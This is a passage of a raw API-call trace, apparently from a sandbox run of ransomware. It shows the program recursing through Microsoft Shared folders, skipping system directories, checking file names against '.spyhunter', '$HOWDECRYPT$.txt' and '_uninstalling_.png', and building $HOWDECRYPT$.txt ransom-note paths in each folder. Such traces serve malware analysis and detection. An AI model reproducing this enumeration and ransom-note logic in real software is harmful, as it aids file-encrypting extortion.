(Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaa0) returned 0x3867e8 [0087.337] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0087.337] lstrcmpiW (lpString1="MSInfo", lpString2="Windows") returned -1 [0087.337] lstrlenW (lpString="Windows") returned 7 [0087.337] lstrcmpiW (lpString1="MSInfo", lpString2="$Recycle.bin") returned 1 [0087.337] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.337] lstrcmpiW (lpString1="MSInfo", lpString2="System Volume Information") returned -1 [0087.337] lstrlenW (lpString="System Volume Information") returned 25 [0087.337] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo") returned 57 [0087.337] lstrcmpW (lpString1="MSInfo", lpString2=".") returned 1 [0087.337] lstrcmpW (lpString1="MSInfo", lpString2="..") returned 1 [0087.337] GetProcessHeap () returned 0x2c0000 [0087.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0087.337] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*") returned 59 [0087.337] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0087.338] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.338] lstrlenW (lpString="Windows") returned 7 [0087.338] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.338] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.338] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.338] lstrlenW (lpString="System Volume Information") returned 25 [0087.338] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\.") returned 59 [0087.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.338] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.338] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.338] lstrlenW (lpString="Windows") returned 7 [0087.338] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.338] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.338] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.338] lstrlenW (lpString="System Volume Information") returned 25 [0087.338] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\..") returned 60 [0087.338] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.338] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.339] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.339] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0087.339] lstrlenW (lpString="Windows") returned 7 [0087.339] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0087.339] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.339] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0087.339] lstrlenW (lpString="System Volume Information") returned 25 [0087.339] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US") returned 63 [0087.339] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0087.339] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0087.339] GetProcessHeap () returned 0x2c0000 [0087.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.340] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*") returned 65 [0087.340] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.340] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.340] lstrlenW (lpString="Windows") returned 7 [0087.340] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.340] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.340] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.340] lstrlenW (lpString="System Volume Information") returned 25 [0087.340] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\.") returned 65 [0087.340] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.340] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.340] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.340] lstrlenW (lpString="Windows") returned 7 [0087.340] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.340] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.340] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.340] lstrlenW (lpString="System Volume Information") returned 25 [0087.340] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\..") returned 66 [0087.340] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.340] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.340] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.340] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="Windows") returned -1 [0087.341] lstrlenW (lpString="Windows") returned 7 [0087.341] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="$Recycle.bin") returned 1 [0087.341] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.341] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="System Volume Information") returned -1 [0087.341] lstrlenW (lpString="System Volume Information") returned 25 [0087.341] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 80 [0087.341] StrStrIW (lpFirst="msinfo32.exe.mui", lpSrch=".spyhunter") returned 0x0 [0087.341] lstrcmpW (lpString1="msinfo32.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.341] lstrcmpW (lpString1="msinfo32.exe.mui", lpString2="_uninstalling_.png") returned 1 [0087.341] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 80 [0087.341] GetProcessHeap () returned 0x2c0000 [0087.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329458 [0087.341] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaa8) returned 0x3867e8 [0087.341] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.341] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.341] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\$HOWDECRYPT$.txt") returned 80 [0087.341] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\$HOWDECRYPT$.txt") returned 80 [0087.341] GetProcessHeap () returned 0x2c0000 [0087.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329548 [0087.341] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xab0) returned 0x3867e8 [0087.342] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.342] lstrcmpiW (lpString1="msinfo32.exe", lpString2="Windows") returned -1 [0087.342] lstrlenW (lpString="Windows") returned 7 [0087.342] lstrcmpiW (lpString1="msinfo32.exe", lpString2="$Recycle.bin") returned 1 [0087.342] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.342] lstrcmpiW (lpString1="msinfo32.exe", lpString2="System Volume Information") returned -1 [0087.342] lstrlenW (lpString="System Volume Information") returned 25 [0087.342] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 70 [0087.342] StrStrIW (lpFirst="msinfo32.exe", lpSrch=".spyhunter") returned 0x0 [0087.342] lstrcmpW (lpString1="msinfo32.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.342] lstrcmpW (lpString1="msinfo32.exe", lpString2="_uninstalling_.png") returned 1 [0087.342] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 70 [0087.342] GetProcessHeap () returned 0x2c0000 [0087.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x324560 [0087.342] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xab8) returned 0x3867e8 [0087.342] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0087.342] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0087.342] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\$HOWDECRYPT$.txt") returned 74 [0087.342] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\$HOWDECRYPT$.txt") returned 74 [0087.342] GetProcessHeap () returned 0x2c0000 [0087.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x384c60 [0087.342] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xac0) returned 0x3867e8 [0087.343] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0087.343] lstrcmpiW (lpString1="OFFICE14", lpString2="Windows") returned -1 [0087.343] lstrlenW (lpString="Windows") returned 7 [0087.343] lstrcmpiW (lpString1="OFFICE14", lpString2="$Recycle.bin") returned 1 [0087.343] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.343] lstrcmpiW (lpString1="OFFICE14", lpString2="System Volume Information") returned -1 [0087.343] lstrlenW (lpString="System Volume Information") returned 25 [0087.343] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14") returned 59 [0087.343] lstrcmpW (lpString1="OFFICE14", lpString2=".") returned 1 [0087.344] lstrcmpW (lpString1="OFFICE14", lpString2="..") returned 1 [0087.344] GetProcessHeap () returned 0x2c0000 [0087.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0087.344] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*") returned 61 [0087.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0087.345] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.345] lstrlenW (lpString="Windows") returned 7 [0087.345] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.345] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.345] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.345] lstrlenW (lpString="System Volume Information") returned 25 [0087.345] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\.") returned 61 [0087.345] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.345] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.345] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.345] lstrlenW (lpString="Windows") returned 7 [0087.345] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.345] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.345] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.345] lstrlenW (lpString="System Volume Information") returned 25 [0087.345] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\..") returned 62 [0087.345] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.345] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.345] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.345] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0087.345] lstrlenW (lpString="Windows") returned 7 [0087.345] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0087.345] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.345] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0087.346] lstrlenW (lpString="System Volume Information") returned 25 [0087.346] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033") returned 64 [0087.346] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0087.346] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0087.346] GetProcessHeap () returned 0x2c0000 [0087.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.346] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*") returned 66 [0087.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.347] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.347] lstrlenW (lpString="Windows") returned 7 [0087.347] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.347] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.347] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.347] lstrlenW (lpString="System Volume Information") returned 25 [0087.347] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\.") returned 66 [0087.347] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.347] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.348] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.348] lstrlenW (lpString="Windows") returned 7 [0087.348] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.348] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.348] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.348] lstrlenW (lpString="System Volume Information") returned 25 [0087.348] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\..") returned 67 [0087.348] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.348] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.348] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.348] lstrcmpiW (lpString1="ACEINTL.DLL", lpString2="Windows") returned -1 [0087.348] lstrlenW (lpString="Windows") returned 7 [0087.348] lstrcmpiW (lpString1="ACEINTL.DLL", lpString2="$Recycle.bin") returned 1 [0087.348] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.348] lstrcmpiW (lpString1="ACEINTL.DLL", lpString2="System Volume Information") returned -1 [0087.348] lstrlenW (lpString="System Volume Information") returned 25 [0087.348] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 76 [0087.348] StrStrIW (lpFirst="ACEINTL.DLL", lpSrch=".spyhunter") returned 0x0 [0087.348] lstrcmpW (lpString1="ACEINTL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.348] lstrcmpW (lpString1="ACEINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0087.348] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 76 [0087.348] GetProcessHeap () returned 0x2c0000 [0087.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x374300 [0087.348] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xac8) returned 0x3867e8 [0087.424] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.424] lstrcmpiW (lpString1="ACEODBCI.DLL", lpString2="Windows") returned -1 [0087.424] lstrlenW (lpString="Windows") returned 7 [0087.424] lstrcmpiW (lpString1="ACEODBCI.DLL", lpString2="$Recycle.bin") returned 1 [0087.424] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.424] lstrcmpiW (lpString1="ACEODBCI.DLL", lpString2="System Volume Information") returned -1 [0087.424] lstrlenW (lpString="System Volume Information") returned 25 [0087.424] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 77 [0087.424] StrStrIW (lpFirst="ACEODBCI.DLL", lpSrch=".spyhunter") returned 0x0 [0087.424] lstrcmpW (lpString1="ACEODBCI.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.424] lstrcmpW (lpString1="ACEODBCI.DLL", lpString2="_uninstalling_.png") returned 1 [0087.425] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 77 [0087.425] GetProcessHeap () returned 0x2c0000 [0087.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3726a0 [0087.425] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x920) returned 0x3867e8 [0087.425] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.425] lstrcmpiW (lpString1="ACERECR.DLL", lpString2="Windows") returned -1 [0087.425] lstrlenW (lpString="Windows") returned 7 [0087.425] lstrcmpiW (lpString1="ACERECR.DLL", lpString2="$Recycle.bin") returned 1 [0087.425] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.425] lstrcmpiW (lpString1="ACERECR.DLL", lpString2="System Volume Information") returned -1 [0087.425] lstrlenW (lpString="System Volume Information") returned 25 [0087.425] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 76 [0087.425] StrStrIW (lpFirst="ACERECR.DLL", lpSrch=".spyhunter") returned 0x0 [0087.425] lstrcmpW (lpString1="ACERECR.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.425] lstrcmpW (lpString1="ACERECR.DLL", lpString2="_uninstalling_.png") returned 1 [0087.425] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 76 [0087.425] GetProcessHeap () returned 0x2c0000 [0087.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372958 [0087.425] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x928) returned 0x3867e8 [0087.425] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.425] lstrcmpiW (lpString1="ACEWSTR.DLL", lpString2="Windows") returned -1 [0087.425] lstrlenW (lpString="Windows") returned 7 [0087.425] lstrcmpiW (lpString1="ACEWSTR.DLL", lpString2="$Recycle.bin") returned 1 [0087.425] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.425] lstrcmpiW (lpString1="ACEWSTR.DLL", lpString2="System Volume Information") returned -1 [0087.425] lstrlenW (lpString="System Volume Information") returned 25 [0087.425] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 76 [0087.425] StrStrIW (lpFirst="ACEWSTR.DLL", lpSrch=".spyhunter") returned 0x0 [0087.425] lstrcmpW (lpString1="ACEWSTR.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.426] lstrcmpW (lpString1="ACEWSTR.DLL", lpString2="_uninstalling_.png") returned 1 [0087.426] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 76 [0087.426] GetProcessHeap () returned 0x2c0000 [0087.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372a40 [0087.426] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x930) returned 0x3867e8 [0087.426] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.426] lstrcmpiW (lpString1="ADO210.CHM", lpString2="Windows") returned -1 [0087.426] lstrlenW (lpString="Windows") returned 7 [0087.426] lstrcmpiW (lpString1="ADO210.CHM", lpString2="$Recycle.bin") returned 1 [0087.426] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.426] lstrcmpiW (lpString1="ADO210.CHM", lpString2="System Volume Information") returned -1 [0087.426] lstrlenW (lpString="System Volume Information") returned 25 [0087.426] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 75 [0087.426] StrStrIW (lpFirst="ADO210.CHM", lpSrch=".spyhunter") returned 0x0 [0087.426] lstrcmpW (lpString1="ADO210.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.426] lstrcmpW (lpString1="ADO210.CHM", lpString2="_uninstalling_.png") returned 1 [0087.426] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 75 [0087.426] GetProcessHeap () returned 0x2c0000 [0087.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x384aa0 [0087.426] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x938) returned 0x3867e8 [0087.426] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.426] lstrcmpiW (lpString1="ALRTINTL.DLL", lpString2="Windows") returned -1 [0087.426] lstrlenW (lpString="Windows") returned 7 [0087.426] lstrcmpiW (lpString1="ALRTINTL.DLL", lpString2="$Recycle.bin") returned 1 [0087.426] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.426] lstrcmpiW (lpString1="ALRTINTL.DLL", lpString2="System Volume Information") returned -1 [0087.426] lstrlenW (lpString="System Volume Information") returned 25 [0087.426] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 77 [0087.427] StrStrIW (lpFirst="ALRTINTL.DLL", lpSrch=".spyhunter") returned 0x0 [0087.427] lstrcmpW (lpString1="ALRTINTL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.427] lstrcmpW (lpString1="ALRTINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0087.427] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 77 [0087.427] GetProcessHeap () returned 0x2c0000 [0087.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372b28 [0087.427] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x940) returned 0x3867e8 [0087.427] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.427] lstrcmpiW (lpString1="MSOINTL.DLL", lpString2="Windows") returned -1 [0087.427] lstrlenW (lpString="Windows") returned 7 [0087.427] lstrcmpiW (lpString1="MSOINTL.DLL", lpString2="$Recycle.bin") returned 1 [0087.427] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.427] lstrcmpiW (lpString1="MSOINTL.DLL", lpString2="System Volume Information") returned -1 [0087.427] lstrlenW (lpString="System Volume Information") returned 25 [0087.427] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 76 [0087.427] StrStrIW (lpFirst="MSOINTL.DLL", lpSrch=".spyhunter") returned 0x0 [0087.427] lstrcmpW (lpString1="MSOINTL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.427] lstrcmpW (lpString1="MSOINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0087.427] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 76 [0087.427] GetProcessHeap () returned 0x2c0000 [0087.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372c10 [0087.427] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x948) returned 0x3867e8 [0087.427] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.427] lstrcmpiW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="Windows") returned -1 [0087.427] lstrlenW (lpString="Windows") returned 7 [0087.427] lstrcmpiW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="$Recycle.bin") returned 1 [0087.427] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.427] lstrcmpiW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="System Volume Information") returned -1 [0087.428] lstrlenW (lpString="System Volume Information") returned 25 [0087.428] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 84 [0087.428] StrStrIW (lpFirst="MSOINTL.DLL.IDX_DLL", lpSrch=".spyhunter") returned 0x0 [0087.428] lstrcmpW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.428] lstrcmpW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="_uninstalling_.png") returned 1 [0087.428] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 84 [0087.428] GetProcessHeap () returned 0x2c0000 [0087.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) 